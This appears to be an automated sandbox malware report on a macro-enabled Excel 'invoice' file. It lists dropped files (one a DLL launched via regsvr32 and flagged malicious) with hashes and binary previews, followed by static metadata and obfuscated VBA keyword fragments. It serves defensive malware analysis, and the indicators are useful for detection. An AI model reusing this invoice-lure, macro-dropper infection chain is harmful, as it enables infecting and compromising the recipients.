                                                                                                                                      Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\996393.cvr
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1392
                                                                                                                                      Entropy (8bit):3.146905721655599
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:gll/3upGvshFO/uSd+EbzlUlHYql/CkY/HxLBXmmP82P+ddmJaqyYgYDzbq:gll/eO0Ondz6lHYxhHJG0p1Pq
                                                                                                                                      MD5:B511B97280F8902D8F205C460BAC3431
                                                                                                                                      SHA1:EFD15EE2CB86C5A3030E9E7FB527CAD7C2ACD81D
                                                                                                                                      SHA-256:5B536AC721BC40755710179C13FF94BF83266717FA6436EEE0DFA91D117C68F0
                                                                                                                                      SHA-512:B3C1766FAC22F556EE7975888074555F2A2A56D81783015B92685BC852745787D852A5338BA8BCA414891FDE201FC765B239E1F7AB3CE3BE05510E03BE06CF20
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: MSQMx.......3..G................g..........................g....[..v................................................................................4c......EXCE....................................|...5...g.......;.......|...<...........A...........l...........................z.......................................H.......................|...................................................................................9...............b...........N....................G..C...........F...........Q.......H...W.......|'...........'..............................................................+...........0...........:...........;...........................................^...........^........................................ ......Z...:!..........n"...........".......'...".......'...".......'...".......'...".......'...".......'..7#..........?...........................e...H...................<...B...........D&../...................LG../.......................$...$...........D&..n370....LG..
                                                                                                                                      C:\Users\user\AppData\Local\Temp\Cab6C4B.tmp
                                                                                                                                      Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                      File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):58936
                                                                                                                                      Entropy (8bit):7.994797855729196
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                                                      MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                                                      SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                                                      SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                                                      SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                                                                      C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):241332
                                                                                                                                      Entropy (8bit):4.206792199643493
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:cGQLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cRNNSk8DtKBrpb2vxrOpprf/nVq
                                                                                                                                      MD5:FA3D2E7DC0BD05B5AEDFE08FAB1F6CA1
                                                                                                                                      SHA1:3576B4581BFC16AADF82EE8334A3A5C9FA53208C
                                                                                                                                      SHA-256:B14E55289527C8ABD24B9982C570142B0463EB7AE1E96D1BD05ACDD71112560E
                                                                                                                                      SHA-512:A1CF22CE16BE9567984AC4987539452991851E80BD49D9040A5FEA7E87E68015BC728F7C4031FC35A28D53D6F2506625A3581FF01B773568FC33615DBB89EEE3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\Tar6C4C.tmp
                                                                                                                                      Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):152533
                                                                                                                                      Entropy (8bit):6.31602258454967
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                                                                      MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                                                                      SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                                                                      SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                                                                      SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                                                      C:\Users\user\AppData\Local\Temp\WER540A.tmp.WERInternalMetadata.xml
                                                                                                                                      Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3110
                                                                                                                                      Entropy (8bit):3.684747436008537
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp3JX3:Wl7LBNuhhgG45nv5J
                                                                                                                                      MD5:544F11F1848CAA1BDF520C7BF1537FD7
                                                                                                                                      SHA1:644C10A1C87B99C77E7A9863547517AE90FDB128
                                                                                                                                      SHA-256:CF5212AF389E57239B30155E147E7B660C2E2856576B97D51575D4BF5B1F27AF
                                                                                                                                      SHA-512:1A34F36C8F8FA96C09CE01ECD2164ADF6B75CFC4B077409D4DC41CA68C6560A243C9DA29DBA2415C4491F7FFDB3A3784325F1E580E9DF018897A0BBCC251C52A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.
                                                                                                                                      C:\Users\user\AppData\Local\Temp\aymakjne.dll
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):318976
                                                                                                                                      Entropy (8bit):7.120180422335748
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:/HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:vdO02Srnh0qEJC+Y218jdU
                                                                                                                                      MD5:8E5596083FD4C3134204E905F7F66325
                                                                                                                                      SHA1:6902210F93D3A940571CC860C4563CD4BE14EDB9
                                                                                                                                      SHA-256:8110E38AFD33797465AB43841B1C54ABFF7A25ACC30FA27C2623966750D34737
                                                                                                                                      SHA-512:E7084948B9F9BCB28F7C85A2812825D8012327BCFB5310F5759AEBD585504624682187F9A6AF86206295BFB4F1A9A178DC9322218B2E0A72E2CB3B8FCFB370E5
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!...2.z...`.......&.......@...............................@..........................................................|....................0..P....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.F....p.......2..............@..@.data...`............4..............@....text4...R.......T...P.............. ..@.rsrc...|........0..................@..@.reloc..P....0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Excel\~ar26F8.xar
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):53009
                                                                                                                                      Entropy (8bit):7.830887605520775
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:2LUQ86SWyYyqKS4+/28nv5LkJ49TQRNnr:lQBdYLSTdfKN
                                                                                                                                      MD5:0F1C74C7084B8DD3BA2524E47E787875
                                                                                                                                      SHA1:1D2DE4747C353CB75756F9A4A76633FA8EBEDD26
                                                                                                                                      SHA-256:FB9F25B1D23FFE5D9EC94866A1D3FCA0FF6FC473ACBE6579B256DBAE0B1AA7B7
                                                                                                                                      SHA-512:BEA53FD5FB1B9FD38468EF7F7C65CFAD24BD9CDC8BE104F11446A6C460C594AB04BD57C0765D29E60E6EE6B9278D882569F88BB60900D12060FE187FAA2C323D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .V...0..W.? ..v....B...J=.].[.W...w.m.^..}.@......%..{o<o<...UR....<].U...FH.......i...).!O......7..... Z.<=.`?R...J..q.0.d.o.Z......j..r....n77P.G........N.O.{Q*O..Jr.0PZiAJ.A.A........I.3.....+.Y. .....,c|..0..b.Qgqe..@......\e...Ad.U....d.(..<..I\.o/0S...0..D...o.{.2..}..rR@r.\..J...6f4.x.\...x.|}F.hK...P/.B\...'...{x.VN.y.......<.@..5....e...+.*.../q.EL..:........=...q....u.D.w.H...].....L...........x.....u.,6.....T.....s.1ai.cw........1n.Hl=.C..O..&EDg......Y1t.O.8....&..a-@.h...`........PK..........!...>,....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 12 08:43:48 2021, atime=Tue Jan 12 08:43:48 2021, length=12288, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):867
                                                                                                                                      Entropy (8bit):4.47302362689527
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:85QWu1LgXg/XAlCPCHaXgzB8IB/jUNX+WnicvbLKG+bDtZ3YilMMEpxRljKATdJU:85YP/XTwz6IhGYevLSDv3q5rNru/
                                                                                                                                      MD5:34B42419EC07BB353437B55D51FCDAC0
                                                                                                                                      SHA1:06611D195641AEAD292D3FE00CF700897807799C
                                                                                                                                      SHA-256:D8D41B83FD02428C3044319FBF03C5CE71AEC0A17191F2592399AF14BF028AB1
                                                                                                                                      SHA-512:A228F3C6073C0C7D71C101C38D5A2C5C0E1DD64865607834C5BEA5CE1A5C925EB38EFD99E7526BD3EC48EC3588085F6E40C4E182F27A4FA00B2A2E0BE53F2285
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: L..................F...........7G..0..m....0..m.....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....,RyM..Desktop.d......QK.X,RyM*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......445817..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\INV2680371456-20210111889374.LNK
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Tue Jan 12 08:43:48 2021, atime=Tue Jan 12 08:43:57 2021, length=58650, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2218
                                                                                                                                      Entropy (8bit):4.4914034227972355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8k/XT3InSiw163F5Qh2k/XT3InSiw163F5Q/:8k/XLInSiB3F5Qh2k/XLInSiB3F5Q/
                                                                                                                                      MD5:4EA962FE3171FDDE0C6D41EA1211CB3B
                                                                                                                                      SHA1:0A1DB0B6D7F44C03709960150B1119B1AC233684
                                                                                                                                      SHA-256:DA295B28EC71F72B4A3D8006C24C460F23A7EA124FE70FFB23D284B0AD090916
                                                                                                                                      SHA-512:399B3E6EC4421A8905E528E1D16437D504747C2F2BE3507062B03856BEA11CCF60798DEA59C1596A0D2F001B1BEFE65715CEA6E41DCA87332191BE0FB3ECFECD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: L..................F.... ........{..0..m.....Lwr.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....,RqM .INV268~1.XLS..p.......Q.y.Q.y*...8.....................I.N.V.2.6.8.0.3.7.1.4.5.6.-.2.0.2.1.0.1.1.1.8.8.9.3.7.4...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\INV2680371456-20210111889374.xlsm.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.V.2.6.8.0.3.7.1.4.5.6.-.2.0.2.1.0.1.1.1.8.8.9.3.7.4...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):139
                                                                                                                                      Entropy (8bit):4.6224865058942335
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:oyBVomxWnnDd8ShydJSRpuYVo0Dd8ShydJSRpuYVomxWnnDd8ShydJSRpuYVov:djUnB80OJSPFp80OJSPFUnB80OJSPFy
                                                                                                                                      MD5:369122AC7CEDA0BC3A63AB9309D3AA13
                                                                                                                                      SHA1:66056E70235BD61BD6501299F7675A519E45F1B9
                                                                                                                                      SHA-256:CC1244B23024A8BA38D6A909FB5957FE7351CD4A3A62C57D08663E1A8F5B5C80
                                                                                                                                      SHA-512:E4C27FB0DC48F55EDE0FAB82B4C1CC9B0591810249253EAD2A96EFBFA9DE1595D9CAAC89F44EB356541DB02B6730096F27007F90799BE7673191E35FF2230C9E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: Desktop.LNK=0..[misc]..INV2680371456-20210111889374.LNK=0..INV2680371456-20210111889374.LNK=0..[misc]..INV2680371456-20210111889374.LNK=0..
                                                                                                                                      C:\Users\user\Desktop\A8FE0000
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):58650
                                                                                                                                      Entropy (8bit):7.85991707505314
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:hde8RzggbLmCf6646CIKISBHiXL2ICmVsLNFqoc:hN1rmCM2FW2Lpn+tc
                                                                                                                                      MD5:32AB480ACD87728B7BE8DE4D0B831587
                                                                                                                                      SHA1:25EE2034D7D69B77EB6C1839AB9FB5EEB3A60730
                                                                                                                                      SHA-256:3214DFD0A066B348C10D0D5EBA282931CBBA07A5361733EF1E887D1A7E61536E
                                                                                                                                      SHA-512:B5C3B68F1A2AB4EEB3040FA2ADC8B369A4BAA16DDFBE74F44CA00F37442DE48050DA795B3DE02A1431DAE9AC7F36BDB06C50973046847EC2E13A9D2EB3A73347
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\Desktop\~$INV2680371456-20210111889374.xlsm
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):330
                                                                                                                                      Entropy (8bit):1.4377382811115937
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                      Malicious:true
                                                                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                      Entropy (8bit):7.77272893585129
                                                                                                                                      TrID:
                                                                                                                                      • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                      • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                      File name:INV2680371456-20210111889374.xlsm
                                                                                                                                      File size:42039
                                                                                                                                      MD5:9b7c2b0abf5478ef9a23d9a9e87c7835
                                                                                                                                      SHA1:6931c4b845a8a952699d9cf85b316e3b3d826a41
                                                                                                                                      SHA256:a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0
                                                                                                                                      SHA512:4c92f1fdbd83eb8e38e93800d2620c328ac59de4d5cdef9e8fbbcfc02fe715f110db49a83880ef0726fb1224d140472abf341b22fa7710710a69f061aa880840
                                                                                                                                      SSDEEP:768:IHT0FIYwYlKUOaSqlRgzxTLKLls5QlHbdYoVq+:uYwQKUOVqlRgzxTOLpZYAq+
                                                                                                                                      File Content Preview:PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:e4e2aa8aa4bcbcac

                                                                                                                                      Static OLE Info

                                                                                                                                      General

                                                                                                                                      Document Type:OpenXML
                                                                                                                                      Number of OLE Files:2

                                                                                                                                      OLE File "/opt/package/joesandbox/database/analysis/338309/sample/INV2680371456-20210111889374.xlsm"

                                                                                                                                      Indicators

                                                                                                                                      Has Summary Info:False
                                                                                                                                      Application Name:unknown
                                                                                                                                      Encrypted Document:False
                                                                                                                                      Contains Word Document Stream:
                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                      Flash Objects Count:
                                                                                                                                      Contains VBA Macros:True

                                                                                                                                      Summary

                                                                                                                                      Author:
                                                                                                                                      Last Saved By:
                                                                                                                                      Create Time:2020-12-07T14:38:21Z
                                                                                                                                      Last Saved Time:2021-01-11T14:32:26Z
                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                      Security:0

                                                                                                                                      Document Summary

                                                                                                                                      Thumbnail Scaling Desired:false
                                                                                                                                      Company:
                                                                                                                                      Contains Dirty Links:false
                                                                                                                                      Shared Document:false
                                                                                                                                      Changed Hyperlinks:false
                                                                                                                                      Application Version:16.0300

                                                                                                                                      Streams with VBA

                                                                                                                                      VBA File Name: Module1.bas, Stream Size: 3215
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/Module1
                                                                                                                                      VBA File Name:Module1.bas
                                                                                                                                      Stream Size:3215
                                                                                                                                      Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      Data Raw:01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                      VBA Code Keywords

                                                                                                                                      Keyword
                                                                                                                                      Integer:
                                                                                                                                      bycilke()
                                                                                                                                      VB_Name
                                                                                                                                      MiV(sem.value)
                                                                                                                                      homepodd()
                                                                                                                                      homepodd
                                                                                                                                      Error
                                                                                                                                      Integer)
                                                                                                                                      bycilke
                                                                                                                                      Function
                                                                                                                                      ol).Name
                                                                                                                                      "!"):
                                                                                                                                      String
                                                                                                                                      "ab":
                                                                                                                                      Split(govs,
                                                                                                                                      Randomize:
                                                                                                                                      yellowsto(yel
                                                                                                                                      Next:
                                                                                                                                      ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
                                                                                                                                      yellowsto(Oa))))
                                                                                                                                      Integer
                                                                                                                                      yellowsto
                                                                                                                                      ol).value
                                                                                                                                      nimo(Int((UBound(nimo)
                                                                                                                                      Replace(Vo,
                                                                                                                                      Chr(sem.Row)
                                                                                                                                      Sheets(ol).Cells(homepodd,
                                                                                                                                      "ab"))
                                                                                                                                      Split(kij(ol),
                                                                                                                                      yellowsto(homepodd))
                                                                                                                                      Rnd))
                                                                                                                                      (Run(""
                                                                                                                                      "moreP_"
                                                                                                                                      Variant)
                                                                                                                                      Attribute
                                                                                                                                      Resume
                                                                                                                                      pagesREviewsd(Optional
                                                                                                                                      ecimovert(nimo
                                                                                                                                      ecimovert
                                                                                                                                      MsgBox
                                                                                                                                      VBA Code
                                                                                                                                      VBA File Name: Sheet1.cls, Stream Size: 1639
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/Sheet1
                                                                                                                                      VBA File Name:Sheet1.cls
                                                                                                                                      Stream Size:1639
